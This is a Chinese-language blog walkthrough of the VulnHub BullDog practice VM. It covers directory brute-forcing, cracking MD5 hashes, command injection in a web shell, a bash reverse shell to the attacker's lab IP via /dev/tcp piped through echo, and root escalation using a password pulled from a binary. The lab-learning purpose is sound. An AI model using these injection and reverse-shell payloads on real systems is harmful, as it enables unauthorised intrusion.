freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

VulnHub靶机学习——BullDog实战记录
2019-04-04 11:44:37

VulnHub靶机学习——BullDog实战记录

一,前言

        作为一名渗透测试行业的菜鸟,一直没有找到好的靶场来进行练习,最近团队里的大佬推荐的Vnluhub(www.vulnhub.com),正好可以提供一个很好的渗透测试环境。于是从上面找了一个安装包比较小的,毕竟安装时间短(其实是毕竟难度不高)。好了,闲话少说,现在让我们开始吧。

二,运行说明

       *靶机难度:初学者/中级

       *目标:提权到root权限并查看flag

       *攻击机:kali linux,IP地址172.16.111.14

       *靶机:bulldog,IP地址172.16.111.90

     (下载地址:https://download.vulnhub.com/bulldog/bulldog.ova

       *运行环境:kali运行在VMware中,靶机在Virtualbox中

       在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式

图片1.png图片1.png        准备工作做好了,接下来就开始吧

三,渗透过程

   1,分别打开kali和bulldog

         bulldog在开机时界面上已经有一个IP地址

图片1.png

         这下方便了,直接在kali自带的的火狐浏览器中访问此地址看看有没有什么好的信息图片2.png          点开中间的Public Notice链接图片3.png         

         额。。。这两个页面好像都不能给我们提供什么有价值的信息

         接下来查看一下网页源代码图片4.png图片5.png

         依然没有什么好的提示。。。。

         接下来爆破目录,看看有没有什么新发现

   2,爆破目录

         在kali中打开命令终端,输入

         Dirb http://172.16.111.90

图片6.png         根据扫描结果,打开链接http://172.16.111.90/admin图片7.png         这是一个登录界面,可是我们没有用户名和密码。难道要用burp爆破一下?等会再说,而且还有dirb里扫描出的一个链接没打开,现在先看看当前页面的源代码图片8.png

        没啥有用的,看看扫描出的另一链接 172.16.111.90/dev图片9.png          怎么又全是英文介绍,不知道我英语学的不好的么。。。

图片10.png         算了,这么长的页面也懒得看,找彦宏哥的百度翻译一下图片11.png

        这算是发现了些有价值的信息,新的系统是用Django语言编写并且启用了SSH,完全删除了PHP。

        页面中间还一个Web-Shell链接,点进去看下图片13.png

       一般来说web shell是能为我们所用的,但是现在提示与服务器进行身份验证才能使用web shell。那好吧,看看源代码

  图片1.png

        哎,发现有奇怪的东西混了进来。这不是MD5加密的信息么,去解密一下

        找一个MD5解密网站,然后复制粘贴让我无语的MD5

       图片1.png

图片2.png         。。。确实是让我无语的MD5,解密了四五条都是这样。但是在最后两个的时候,终于有了收获图片3.png图片4.png        bulldog和bulldoglover会不会就是用户名和密码呢,现在去刚开始的登录页面

图片5.png图片6.png

       分别用bulldog和bulldoglover轮流当做用户名和密码试了试,根本登不上去。不过话说这火狐浏览器确实是敬业,登录失败了还问我要不要保存登录信息。

       这时候想起来在查看刚才页面的源代码时,MD5值前面好像有对应的用户名,用他们登陆试试

       经过尝试之后果然成功了,不过用nick登进去好像没有什么可以为我们所用的功能

图片7.png        尝试用sarah登录一下,结果页面跟nick一样


图片8.png

       现在我们找到了两组用户名和密码,记下来可能等会要用

             nick---bulldog               sarah---bulldoglover

       这时候再打开172.168.111.90/dev页面,发现刚才的web shell能用了图片9.png

       不过好像只能用系统给出的几个命令。先试一下有没有命令注入

3,命令注入、shell反弹

       在输入框里输入Ifconfig &whoami图片10.png


       根据反馈结果判断存在命令注入,那接下来就好办了。

       在攻击机kali中打开命令终端开始监听,输入nc -lvnp 6666

图片11.png

       尝试bash反弹,在靶机打开的网页命令框中输入

            bash -i >& /dev/tcp/172.16.111.14 /6666 0>&1

       结果。。。。。。。

图片12.png图片13.png                                                                                                                                emmm...好尴尬

        换一种方式

        尝试输入       ls &bash -i >& /dev/tcp/172.16.111.14 /6666 0>&1

图片14.png

        服务器还是报错500。多次尝试之后,使用echo命令反弹shell成功

            echo "bash -i >& /dev/tcp/172.16.111.14/6666 0>&1" | bash

图片15.png

        接下来就是提权了

四,root提权、查看flag

        首先查看有哪些系统用户,cat /etc/passwd。发现了一个重点对象:bulldogadmin

图片16.png

       然后,查找他的文件  find / -user bulldogadmin 2>/dev/null

图片17.png        发现有hiddenadmindirectory隐藏目录,用less命令打开里面包含的文件看看

图片19.png

        好吧,又是英文,复制下翻译去图片20.png         同样的方式打开另一个文件查看一下

图片21.png

        发现customPermissionApp里面包含的都是字符,输入命令

               strings/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp     

        查看此文件   图片22.png

        虽然我英语不好,但是依然很轻松地看出文件中间有一个被 H 打断的PASSWORD单词。于是把前后字段去掉H,得到一句SUPERultimatePASSWORDyouCANTget   把它保存着,这可能是我们会要用到的密码

         Su命令执行一下

图片23.png

                                                                                             su: must be run from a terminal 需要一个终端

         好吧,触及到我的知识盲区了

图片24.png

        上网查了一下资料,可以用python调用本地的shell,命令:

                python -c 'import pty;pty.spawn("/bin/bash")'图片25.png

         然后执行命令   sudo su -    ,输入刚才记下来的的密码试一下,结果成功获得root权限,拿到flag

         输入ls命令,发现里面只有一个文本文档

         输入    cat congrats.txt   打开看下

图片26.png

 五,经验总结

         首先要爆破出admin和dev页面,利用解密MD5得到的密码登录进系统。然后绕过bulldog的系统限制,反弹shell到kali。当然最重要的是root提权,这方面我做的不够好,有些命令不懂,还要去查的网上的资料。Shell反弹和对于linux系统命令掌握的还是太少,以后要多学习,多记。总之,在渗透测试上还有很长的路要走。


Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号

ewm.png

# 渗透测试 # root权限 # Flag
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者